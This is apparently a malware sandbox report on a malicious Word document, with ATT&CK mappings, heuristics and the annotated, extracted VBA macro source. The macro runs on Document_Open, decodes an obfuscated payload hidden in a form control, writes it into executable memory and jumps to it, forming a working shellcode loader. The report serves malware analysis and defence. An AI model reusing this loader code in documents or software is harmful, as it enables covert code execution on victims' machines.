MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1027 Obfuscated Files or Information (arithmetic-expression constants, decoy assignments, custom base64 table — see the extracted macro below)
T1620 Reflective Code Loading (probable: the macro decodes an embedded blob, copies it into memory requested with flags 0x1000/0x40 and hands an address inside it to an externally declared function; the Declare statements are not in the extract, so the exact APIs are unconfirmed)
The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.Agent-6352658-0' heuristics. The 'Document_Open' macro runs the payload chain automatically when the document is opened. The extracted VBA (modules abodule, Module1–Module3, ThisDocument) is heavily obfuscated — constants written as arithmetic expressions, decoy string/numeric assignments, discarded Pmt() calls — but its structure is readable: it takes the last 7,844 characters of a UserForm control item's Name, reverses a per-position character shift (−4 on even, −3 on odd positions), decodes the result with a custom base64 table into 5,883 bytes, copies those bytes into memory requested with arguments consistent with MEM_COMMIT (0x1000) and PAGE_EXECUTE_READWRITE (0x40), and passes an address inside that region to an external function. That is an embedded in-memory shellcode loader, not a URL-based downloader: the macro contains no URL and no network call, and the URLs listed under 'Embedded URL' are XMP/RDF/DrawingML schema namespaces from document metadata, not contact points. The Declare statements for the three external functions are not in the extract, so the exact Windows APIs, and whatever the shellcode itself does once running (it may well retrieve a second stage), cannot be confirmed from this report.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6352658-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6352658-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro (auto-executes when the document is opened, subject to the host's macro settings). Matched line in script:
Private Sub Document_Open() Dim intersexual As Variant -
Embedded URL info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note: all eight URLs below are XML namespace identifiers (Adobe XMP, W3C RDF, Dublin Core, OOXML DrawingML) found in the OLE document body — the kind of strings left by embedded image metadata — and none is referenced by the extracted macro, so they should not be treated as network indicators. URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8449 bytes |

SHA-256: 2ae0f20f1483c4a62fdd9c1397e927f17cb285869f181fc2255d405121d719ed
Preview script — first 1,000 lines of the extracted script (shown as extracted; the hash above covers the unmodified artifact)
Attribute VB_Name = "abodule"
' Builds the 256-entry character -> 6-bit value table used by Module1.caltrop.
' The entries written here form the standard base64 alphabet:
'   'A'..'Z' -> 0..25, 'a'..'z' -> 26..51, '0'..'9' -> 52..61, '+' -> 62, '/' -> 63.
' Because every upper bound is inclusive and written one past the alphabet,
' 91 ('['), 58 (':') and 123 ('{') also get values; standard base64 input
' never contains them, so they are harmless artifacts of the obfuscation.
' Both parameters are ignored (decoy arguments). Returns the Byte array as a Variant.
Function contaminated(pistol, polka)
Dim elephant(255) As Byte
' 83 - 47 + 29 = 65 ('A'); runs while <= 91
restcure = 83 - 47 + 29
Do While restcure <= 90 + 1
elephant(restcure) = restcure - 65
restcure = restcure + 1
Loop
' 48 ('0'); runs while <= 58: '0'..'9' -> 52..61
restcure = 48
Do While restcure <= 50 + 8
elephant(restcure) = restcure + 4
restcure = restcure + 1
Loop
' 97 ('a'); runs while <= 123: 'a'..'z' -> 26..51
restcure = 97
Do While restcure <= 120 + 3
elephant(restcure) = restcure - 71
restcure = restcure + 1
Loop
' '/' -> 63
elephant(47) = 63
' '+' -> 62
restcure = 43
elephant(restcure) = 60 + 2
contaminated = elephant
End Function
' Returns the Unicode code point of the first character of `detonative`
' (plain AscW). Not referenced anywhere else in this extract.
Function aperit(detonative)
aperit = AscW(detonative)
End Function
Attribute VB_Name = "Module1"
' Arithmetic dispatcher that hides the operators of the base64 decoder.
' `carassius` selects the operation applied to (puncuality, resuspension):
'   47 -> integer division (\), 57 -> bitwise And, 65 -> multiplication.
' Any other selector leaves `potolok` unassigned, so the function returns Empty.
Function schsfe(puncuality, resuspension, carassius)
' 47 + (10 / 2 - 5) = 47
If carassius = 47 + (10 / 2 - 5) Then
potolok = puncuality \ resuspension
' 57 + (5 - 3) / 2 - 1 = 57
ElseIf carassius = 57 + (5 - 3) / 2 - 1 Then
potolok = puncuality And resuspension
' 65 + (56 / 7 - 4 * 2) = 65
ElseIf carassius = 65 + (56 / 7 - 4 * 2) Then
potolok = puncuality * resuspension
End If
schsfe = potolok
End Function
' The moon went hiding, stars quit shining
' Rain was driving, thunder, lightning
' Decodes the encoded payload string into raw bytes. In order:
'   1. StrConv(..., 128) (128 = vbFromUnicode) turns the input into an ANSI byte array.
'   2. Every byte is shifted back: -4 at even indexes, -3 at odd indexes,
'      over indexes 0..7843 (7,844 characters). vbKeyShift = 16, so quickscented = 4.
'   3. Standard base64 decode, 4 characters -> 3 bytes, using the table from
'      abodule.contaminated and shift/mask helpers built with schsfe.
' Output: 7844 / 4 * 3 = 5,883 bytes written into `breadline` (sized 6,963).
' The function is declared As String, so the Byte array is returned as a String.
' Every `Pmt ...` statement is VBA's financial Pmt() with the result discarded:
' filler with no effect on the decode.
Function caltrop(inseverable) As String
Dim breadline(6962) As Byte
Dim briefing As Long
Dim impropriety As Long
Dim osutrigger As Long
Dim elief(63) As Long
Dim mantinea As Long
Dim alar() As Byte
Dim achievable(63) As Long
Dim constitution(63) As Long
Dim anguilliform() As Byte
anguilliform = VBA.StrConv(inseverable, 128)
Pmt 0, 100, 8371, 34078, 5
' 16 - 12 = 4
quickscented = vbKeyShift - 12
' (20 - 4 * 5) = 0 To 7843: every input byte
For desmodus = (20 - 4 * 5) To 7800 + 43
If (desmodus Mod 2 = (5 - 5)) Then
' even index: subtract 4
anguilliform(desmodus) = anguilliform(desmodus) - quickscented
ElseIf Not (desmodus Mod 2 = (4 - 4)) Then
' odd index: subtract 3
anguilliform(desmodus) = anguilliform(desmodus) - (quickscented - 1)
End If
Next desmodus
Pmt 0, 76, 37014, 55110, 4
' base64 character -> value table (the two arguments are ignored)
biplicity = abodule.contaminated(400, 20)
' For i = 0..63 precompute i*64, i*4096 and i*262144 (selector 65 = multiply):
' the <<6, <<12 and <<18 placements of the four 6-bit groups.
For osutrigger = (7 - 7) * 1 To (50 + 13) * (5 - 4)
achievable(osutrigger) = _
schsfe(osutrigger, _
51 - 73 + 86, _
65)
constitution(osutrigger) = _
schsfe(osutrigger, 112 - 102 + 4086, 65)
elief(osutrigger) = schsfe(osutrigger, 88 - 47 + 262103, 65)
Next osutrigger
Pmt 0, 84, 35877, 21541, 7
alar = anguilliform
Pmt 0, 76, 23498, 15343, 6
' accordance = 3, giantism = 2
accordance = 100 - 56 - 41
giantism = 67 - 40 - 25
' `briefing` is advanced by 3 at the bottom of the body plus 1 by Next,
' so each pass consumes one 4-character group.
For briefing = (4 - 4) To 7800 + 43
bumpy = alar(briefing)
headquarters = alar(briefing + 2)
hilar = constitution(biplicity(alar(briefing + 1)))
dioscorea = achievable(biplicity(headquarters)) + _
biplicity(alar(briefing + accordance))
' 24-bit value: v0<<18 + v1<<12 + v2<<6 + v3
mantinea = elief(biplicity(bumpy)) + hilar + dioscorea
' (mantinea And &HFF0000) \ &H10000 -> first output byte (selectors 57 = And, 47 = \)
osutrigger = schsfe(mantinea, 55 - 126 + 16711751, 50 + 7)
breadline(impropriety) = schsfe(osutrigger, 65 - 101 + 65572, 40 + 7)
' (mantinea And &HFF00) \ &H100 -> second output byte
osutrigger = schsfe(mantinea, 118 - 18 + 65180, 50 + 7)
breadline(impropriety + 1) = schsfe(osutrigger, 35 - 84 + 305, 47)
' mantinea And &HFF -> third output byte
breadline(impropriety + giantism) = schsfe(mantinea, 94 - 68 + 229, 57)
impropriety = impropriety + giantism + 1
briefing = briefing + 3
Next
caltrop = breadline
End Function
Attribute VB_Name = "Module2"
' Stages the decoded payload in executable memory and returns the base address.
' `sapiens` is the Variant holding the bytes produced by Module1.caltrop; most
' other locals are dead stores. `genitalia` and (via Module3.extend) `crosstalk`
' are externally declared functions whose Declare statements are not in this
' extract (Module4 is empty here), so the Windows APIs behind them are inferred
' from argument shape and must be confirmed against the full module set.
Function incapable(sapiens)
Dim belligerently As Variant
Dim catwalk As Integer
Dim chaucer As Byte
Dim appositively As Long
' Conditional compilation on Win64. This branch declares pointer-sized locals
' (LongPtr) and sets mendacious = 102 - 52 - 42 = 8; the other declares Long
' and sets mendacious = 118 - 111 - 3 = 4. mendacious is therefore the pointer
' size. Which branch is compiled depends on how the host evaluates Win64 in the
' comparison against 0.
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim myxomatosis As Long
Dim sedition As LongPtr
mendacious = 102 - 52 - 42
Dim brimstone As LongPtr
Dim desecration As Byte
Dim modernism As Variant
Dim accouplement As LongPtr
Dim valueless As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sedition As Long
mendacious = 118 - 111 - 3
Dim brimstone As Long
Dim accouplement As Long
#End If
' Copy `mendacious` (pointer-size) bytes from offset 8 of the Variant `sapiens`
' into `sedition`. Offset 8 of a VARIANT is its data union, so for a string or
' array Variant this reads out the pointer to the decoded payload bytes.
nephrolithiasis = VarPtr(sedition)
sermonize = extend(nephrolithiasis, VarPtr(sapiens) + 8, mendacious)
' Arguments for genitalia, resolved:
'   tarahumara   = -1    (the value GetCurrentProcess returns as a pseudo-handle)
'   brimstone    =  0    ByRef: receives the base address
'   archeologist =  0
'   accouplement = 9936  ByRef: region size
'   addressed    = 4096  = &H1000, MEM_COMMIT
'   sarcosome    = 64    = &H40, PAGE_EXECUTE_READWRITE
' This shape matches NtAllocateVirtualMemory(ProcessHandle, &BaseAddress,
' ZeroBits, &RegionSize, AllocationType, Protect) - unconfirmed without the Declare.
tarahumara = 79 - 106 + 26
brimstone = 25 - 45 + 20
archeologist = 20 - 77 + 57
accouplement = 1 - 72 + 10007
addressed = 52 - 38 + 4082
sarcosome = 53 - 88 + 99
tetonnement = genitalia(ByVal tarahumara, _
brimstone, ByVal archeologist, accouplement, ByVal addressed, _
ByVal sarcosome)
' dead stores
yam = yam
expressionism = "beardless"
' Copy 124 - 46 + 5805 = 5,883 bytes - exactly caltrop's output length - from the
' decoded payload into the newly obtained executable region.
extend brimstone, sedition, 124 - 46 + 5805
' unused values and a discarded Pmt() call
imbibe = 30 + 1
misunderstood = 39330 + 0
gazebo = 416070 + 1
Pmt 0, imbibe, 11127, 12298, 4
' Base address of the region now holding the payload.
incapable = brimstone
End Function
' Orchestrates the payload chain; called from ThisDocument.Document_Open.
' Reads the encoded blob from the UserForm `leptodactylus`, decodes it with
' Module1.caltrop, stages it in executable memory with Module2.incapable, and
' passes an address inside that memory to the externally declared `ensign`.
' The many string/numeric assignments and the `Pmt ...` statements are filler
' with no effect; the Function never assigns a return value.
Function avuncular()
Dim musclebound As String
Dim ranking As Long
' Day(#12/5/2013#) = 5: select item 5 of control `buteonine` on the form.
' Setting .Value to an index and then reading .SelectedItem.Name is consistent
' with a TabStrip or MultiPage control; the form's design stream is not in the
' extract, so the control type is unconfirmed.
leptodactylus.buteonine.Value = Day(#12/5/2013#)
varday = asperous = "monstrous"
disgustedly = humphrey
marginally = geebung
explication = "momentous"
colostrum = calcaneal
donatus = actor
naproxen = "unconscious"
yaffle = "memorial"
Set towith = leptodactylus.buteonine.SelectedItem
anguished = 74
adad = 16881
adynamia = 231668
Pmt 0, anguished, 17696, 54956, 5
' The encoded payload is carried in the selected item's Name property;
' keep its last 52 - 24 + 7816 = 7,844 characters.
cutout = towith.Name
sublineation = 52 - 24 + 7816
acetal = Right(cutout, sublineation)
' Decode to 5,883 raw bytes.
fagales = Module1.caltrop(acetal)
adult = 60
increment = 34263
acroclinium = 486856
Pmt 0, adult, 3783, 38171, 2
fendre = "astrologer"
wench = "macrocheira"
' Entry-point offset into the staged code, chosen by the Win64 conditional:
' 74 - 85 + 2075 = 2064 in the LongPtr branch,
' (120 - 90 + 751) + 3459 = 4240 in the Long branch.
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim sulkiness As Long
Dim nonreciprocating As LongPtr
Dim crossbones As LongPtr
Dim afghani As Integer
Dim carol As String
Dim medley As LongPtr
Dim blather As LongPtr
Dim flageolet As LongPtr
unjustifiable = 74 - 85 + 2075
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim de As Variant
Dim crossbones As Long
Dim goodlooking As Byte
Dim nonreciprocating As Long
Dim medley As Long
extinguish = 120 - 90 + 751
Dim blather As Long
Dim flageolet As Long
unjustifiable = extinguish + 3459
#End If
' filler
nursing = 10 - 79 + 69
halfholiday = "plaster"
hypovolemia = 114 - 38 + 4020
inshore = 5
exude = 7913
filariid = 572397
Pmt 0, inshore, 22828, 17760, 6
forfend = millettia
corpulence = "changeful"
disdainful = "managed"
indeterminate = 103
mystery = 16919
annex = 300455
Pmt 0, indeterminate, 24790, 33813, 5
' Stage the decoded bytes in executable memory; returns the region's base address.
epidiascope = fagales
golden = "adultness"
nonreciprocating = incapable(epidiascope)
coryphaenidae = "statistical"
annular = "status"
Dim obduration As String
Dim abattoir As Integer
' medley = 0; crossbones = base + offset; blather = 116 - 50 + 201461 = 201527 = &H31337;
' flageolet = 3500 is never used.
medley = 8 - 110 + 102
crossbones = nonreciprocating + unjustifiable
blather = 116 - 50 + 201461
flageolet = 105 - 64 + 3459
' Transfer of control: the address inside the executable region is the third
' argument; the others are 0 and the constant &H31337. The Declare for `ensign`
' is not in the extract, so the exact API (a thread-creation or callback-taking
' routine would fit a 7-argument call) cannot be confirmed from this listing.
nazism = ensign(blather, medley, crossbones, medley, medley, medley, medley)
' filler
axenic = 24
arctium = 17955
churchill = 492273
Pmt 0, axenic, 25360, 47372, 7
End Function
Attribute VB_Name = "Module3"
' Thin wrapper over the externally declared `crosstalk`: copies `forewing` bytes
' from address `somatic` to address `horsecar`. crosstalk is called with
' (-1, dest, src, size, outParam) - the WriteProcessMemory(hProcess, lpBaseAddress,
' lpBuffer, nSize, lpNumberOfBytesWritten) shape with the current-process
' pseudo-handle -1; the Declare is not in this extract, so that mapping is inferred.
' The function never assigns a return value; both call sites ignore it.
Function extend(horsecar, somatic, forewing)
' Pointer-sized (LongPtr) versus Long locals, selected by the Win64 conditional.
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim alca As Byte
Dim ordo As Variant
Dim accused As LongPtr
Dim neurasthenia As LongPtr
Dim monopteral As LongPtr
Dim buganda As Long
Dim afoot As LongPtr
Dim airliner As LongPtr
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim neurasthenia As Long
Dim callboard As Integer
Dim accused As Long
Dim snowplow As String
Dim afoot As Long
Dim overtaken As Integer
Dim monopteral As Long
Dim bimonthly As Long
Dim airliner As Long
Dim argosy As Byte
Dim endlessly As String
#End If
' filler with no effect
elephantus = Math.Round(435)
expressionism = "underling"
' destination address, byte count, source address
neurasthenia = horsecar
airliner = forewing
yam = "frappe"
afoot = somatic
' filler and a discarded Pmt() call
selfworship = 110 + 4
gest = 6360 + 2
ceremony = 404330 + 7
Pmt 0, selfworship, 5176, 35668, 8
expressionism = "caliche"
' 33 - 66 + 32 = -1
accused = 33 - 66 + 32
' monopteral is passed ByRef uninitialized and receives the call's output value.
crosstalk ByVal accused, neurasthenia, afoot, airliner, monopteral
expressionism = expressionism
End Function
Attribute VB_Name = "Module4"
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word executes Document_Open when the document is opened
' (subject to the host's macro settings). Its only real action is the call to
' avuncular, which runs the decode-and-execute chain; the remaining statements
' are dead stores and a discarded Pmt() call.
Private Sub Document_Open()
Dim intersexual As Variant
Dim hyetography As Variant
unpretentiousness = "dawdler"
kittentails = "astrocytic"
' Start the payload chain.
avuncular
coelo = 40 + 8
disfigurement = 20980 + 7
adhibition = 587870 + 0
Pmt 0, coelo, 16481, 36653, 8
End Sub
Attribute VB_Name = "leptodactylus"
Attribute VB_Base = "0{B561C2D5-313D-4B73-9326-29B8460ACA37}{2FB88A8C-084A-4D7B-98CC-FCE0D0AA7F5D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||